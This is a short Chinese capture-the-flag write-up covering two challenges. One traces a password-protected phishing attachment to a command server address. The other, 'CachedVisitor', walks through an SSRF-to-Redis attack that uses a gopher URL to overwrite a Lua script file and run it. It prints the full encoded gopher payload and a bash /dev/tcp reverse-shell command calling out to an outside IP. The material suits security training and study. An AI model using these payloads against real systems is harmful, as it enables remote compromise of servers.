2025软件安全攻防赛部分WriteUp
Sky1ie钓鱼邮件
邮件显示24岁生日快乐,发送日期为2024年11月11日
压缩包带密码,猜测是生日,所以是20001111
解压后给奇安信情报沙箱分析
222.218.218.218:55555
CachedVisitor
ssrf + redis,可通过gopher协议写文件
main.lua中
local function read_file(filename)
local file = io.open(filename, "r")
if not file then
print("Error: Could not open file " .. filename)
return nil
end
local content = file:read("*a")
file:close()
return content
end
local function execute_lua_code(script_content)
local lua_code = script_content:match("##LUA_START##(.-)##LUA_END##")
if lua_code then
local chunk, err = load(lua_code)
if chunk then
local success, result = pcall(chunk)
if not success then
print("Error executing Lua code: ", result)
end
else
print("Error loading Lua code: ", err)
end
else
print("Error: No valid Lua code block found.")
end
end
local function main()
local filename = "/scripts/visit.script"
local script_content = read_file(filename)
if script_content then
execute_lua_code(script_content)
end
end
main()读取了/scripts/visit.script文件并执行了该文件中的lua代码
那么可以通过gopher协议覆盖/scripts/visit.script文件,写入lua代码去反弹shell
lua代码
##LUA_START##os.execute("/bin/bash -c 'sh -i %26>/dev/tcp/120.24.186.57/1234 0>%261'")##LUA_END##构造payload
gopher://127.0.0.1:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%24101%0D%0A%0A%0A%23%23LUA_START%23%23os.execute%28%22/bin/bash%20-c%20%27sh%20-i%20%26%3E/dev/tcp/120.24.186.57/1234%200%3E%261%27%22%29%23%23LUA_END%23%23%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%248%0D%0A/scripts%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%2412%0D%0Avisit.script%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A
通过burpsuite发包
获取shell
